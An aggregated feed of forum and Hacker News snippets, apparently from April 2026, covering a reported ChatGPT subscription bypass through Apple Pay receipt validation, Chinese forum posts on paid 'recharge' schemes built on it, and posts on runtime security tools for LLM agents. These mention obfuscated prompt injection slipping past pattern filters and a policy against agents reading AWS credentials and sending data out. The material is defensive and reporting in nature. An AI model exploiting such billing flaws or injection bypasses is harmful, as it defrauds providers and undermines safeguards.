OpenAI Developer Community – 17 Apr 26 [Security Report] Apple Pay receipt validation does not bind to purchaser... ChatGPT Bugs chatgpt api ⚠ Disclaimer: This report is for technical research and responsible disclosure purposes only. I do not endorse or encourage any unauthorized use, account sharing, or commercial exploitation of this finding. All testing was conducted on accounts I... Reading time: 1 min 🕑 Likes: 2 ❤ 1 个帖子 - 1 位参与者 阅读完整话题
内鬼急眼了 [Security Report] Apple Pay receipt validation does not bind to purchaser Apple ID – potential subscription bypass - ChatGPT / Bugs - OpenAI Developer Community 25 个帖子 - 21 位参与者 阅读完整话题
不知道是谁提交了漏洞给openai官方,直接搞得大家都不别玩了,无大语,下面是提交的信息 [Security Report] Apple Pay receipt validation does not bind to purchaser Apple ID – potential subscription bypass - Bugs - OpenAI Developer Community 还有指向linux.do的地址 外面那些收费几千教人“GPT 代充技术”的,教的就是这几步,GPT Plus 土耳其漏洞全公开技术贴(可用性待验证) 21 个帖子 - 14 位参与者 阅读完整话题
Hi HN I’ve been working on an open-source project to explore a problem I keep running into with LLM systems in production: We give models the ability to call tools, access data, and make decisions… but we don’t have a real runtime security layer around them. So I built a system that acts as a control plane for AI behavior, not just infrastructure. GitHub: https://github.com/dshapi/AI-SPM What it does The system sits around an LLM pipeline and enforces decisions in real time: Detects and blocks prompt injection (including obfuscation attempts) Forces structured tool calls (no direct execution from the model) Validates tool usage against policies Prevents data leakage (PII / sensitive outputs) Streams all activity for detection + audit Architecture (high-level) Gateway layer for request control Context inspection (prompt analysis + normalization) Policy engine (using Open Policy Agent) Runtime enforcement (tool validation + sandboxing) Streaming pipeline (Apache Kafka + Apache Flink) Output filtering before response leaves the system The key idea is: Treat the LLM as untrusted, and enforce everything externally What broke during testing Some things that surprised me: Simple pattern-based prompt injection detection is easy to bypass Obfuscated inputs (base64, unicode tricks) are much more common than expected Tool misuse is the biggest real risk (not the model itself) Most “guardrails” don’t actually enforce anything at runtime What I’m unsure about Would really appreciate feedback from people who’ve worked on similar systems: Is a general-purpose policy engine like OPA the right abstraction here? How are people handling prompt injection detection beyond heuristics? Where should enforcement actually live (gateway vs execution layer)? What am I missing in terms of attack surface? Why I’m sharing This space feels a bit underdeveloped compared to traditional security. We have CSPM, KSPM, etc… but nothing equivalent for AI systems yet. Trying to explore what that should look like in practice. Would love any feedback — especially critical takes. Comments URL: https://news.ycombinator.com/item?id=47799856 Points: 1 # Comments: 0
Article URL: https://safeweave.dev Comments URL: https://news.ycombinator.com/item?id=47779508 Points: 1 # Comments: 0
Article URL: https://atticsecurity.com/en/blog/why-llms-hate-fake-data-token-proxy/ Comments URL: https://news.ycombinator.com/item?id=47778087 Points: 2 # Comments: 2
Article URL: https://www.strix.ai/blog/pentesting-every-pull-request Comments URL: https://news.ycombinator.com/item?id=47771386 Points: 2 # Comments: 0
Article URL: https://github.com/cloudwatcher-dev/cloudwatcher-aws-cloudformation Comments URL: https://news.ycombinator.com/item?id=47770486 Points: 1 # Comments: 0
Article URL: https://agentgraph.co/check Comments URL: https://news.ycombinator.com/item?id=47767201 Points: 2 # Comments: 0
We use Claude Code, Cursor, and Copilot daily. These tools run shell commands, read files, and call APIs on their own. When something goes wrong you find out after. A .env file gets read, a secret ends up somewhere it should not, a command runs that nobody approved. EDR sees process spawns. Cloud audit logs see API calls. Neither understands that the agent's chain of actions together is credential theft. Burrow sits between the agent and the machine. You define policies in plain language, like "block any agent from deleting production resources" or "alert if an agent reads AWS credentials and then sends data to an external endpoint." Burrow maps those policies against the actual tools, MCP servers, and plugins in your environment, then intercepts tool calls at the framework level before they execute. Risky calls get dropped. Everything else passes through. Works with Claude Code, Cursor, Copilot, Windsurf, CrewAI, LangChain, LangGraph, and a few more. CLI and SDK install in under a minute. Free tier for individuals, paid for teams. I ran infrastructure security at a large media company before this. Going full time on Burrow later this month. Happy to answer anything, especially the "does this actually work in production" question. try - https://burrow.run Comments URL: https://news.ycombinator.com/item?id=47761957 Points: 3 # Comments: 0
Article URL: https://tools.examineip.com/ Comments URL: https://news.ycombinator.com/item?id=47749285 Points: 1 # Comments: 0
Article URL: https://github.com/TheDen/ghapin Comments URL: https://news.ycombinator.com/item?id=47739132 Points: 2 # Comments: 0